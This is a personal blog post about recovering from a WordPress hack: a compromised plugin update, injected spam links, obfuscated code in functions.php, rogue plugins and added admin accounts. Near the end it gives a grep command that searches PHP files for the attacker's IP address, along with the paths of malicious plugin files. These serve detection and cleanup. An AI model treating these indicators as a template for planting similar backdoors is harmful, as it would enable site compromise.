I rarely re-read or revisit old blog posts on this site. Generally speaking I write them, give them a quick once over, and send them on their way. The only time I look up old posts is to either verify a date or find a link to send to someone. That’s what I was doing over the weekend when I dug up a blog post from four years ago and was surprised to find spam links embedded throughout the post — links I did not put there. The game, as they say, was afoot.
Discovering your website’s been hacked in this fashion isn’t like coming home from work and discovering that someone has kicked in your front door. It’s like coming home fro mwork, unlocking your front door, setting down your stuff, fixing a drink, sitting down in the living room… and then realizing your television is missing. And quite often it’s like realizing that the television in that back bedroom you only go into once a month is missing. At least when someone kicks in your front door, you know how they got in.
Last week through WordPress I was notified that one of the plugins I use was got hacked. I don’t mean someone used a vulnerability associated with one of my plugins to hack my website. Apparently someone hacked multiple WordPress plugins at their source, which then got pushed out to everyone who was using those plugins. This is one of those cases where doing the right thing and enabling auto updates bit me.
My initial hunch, that someone had snuck those spammy links in directly into my posts, was incorrect. When I tried editing one of the infected posts, turned out to be wrong. When I attempted to edit the offending posts, the spam links were nowhere to be found. Instead, they were somehow being injected on the fly when each post was being generated. I ultimately found a bunch of encrypted code hiding inside my functions.php file that seemed to be doing the dirty work.
I still haven’t put all the pieces together, but best I can tell here’s what happened.
– POWERPRESS PODCASTING PLUGIN BY BLUBERRY: Last week I received a notification from WordPress that this plugin (also known as “PowerPress”) had been compromised. (The plugin has since been updated.)
– HEAD, FOOTER, AND POST INJECTION PLUGIN: Head, Foorter, and Post Injection Plugin: I don’t know if this is related, but around the same time this plugin appeared on all my WordPress sites and was enabled. I only noticed it because it broke the header of most of my WordPress sites. In the “post injection” portion of the plugin was a bunch of encrypted code. That seems sus. (The plugin has since been removed.)
– ADMIN ACCOUNTS CREATED: I discovered four new admin accounts on all my WordPress sites. All of them had randomly generated names that were eight characters long and email domains of example.com. (Accounts were all removed.)
– MORE SUSPICIOUS PLUGINS DISCOVERED: Discovered the existence of two more plugins, “Code Functionality” and another with just the name of my domain (“RobOHara.com”) that were new. One linked back to my functions.php file which had been compromised and contained a very large section of hex-obfuscated code. Removed all the offending code.
I think that’s everything I found. Because my old WordPress theme was out of date and no longer being supported, I’ve changed to a new one. I don’t love the new one and I’m sure I’ll be tweaking it a bit, but it’s modern and up to date, so there’s that. I’ve also installed a couple of WordPress plugins that scan for code changes so I won’t be caught quite so blind-sided next time.
EDIT:
I found someone else, Terence Eden on Mastodon, who experienced the exact same hack. One of the remediations he suggested was grepping all the PHP files on your site for the IP address of the attacker. Here was the exact command he suggested:
grep -r –include=”*.php” “94\.156\.79”
Leveraging that, I found multiple other malicious plugins that had been installed on my websites, including:
/wp-content/plugins/custom-mail-smtp-checker/custom-mail-smtp-checker.php
/wp-content/plugins/informative/testplugingodlike.php
Between removing those, the original ones, and removing all the newly created admin accounts, I think (hope) I have this one squashed.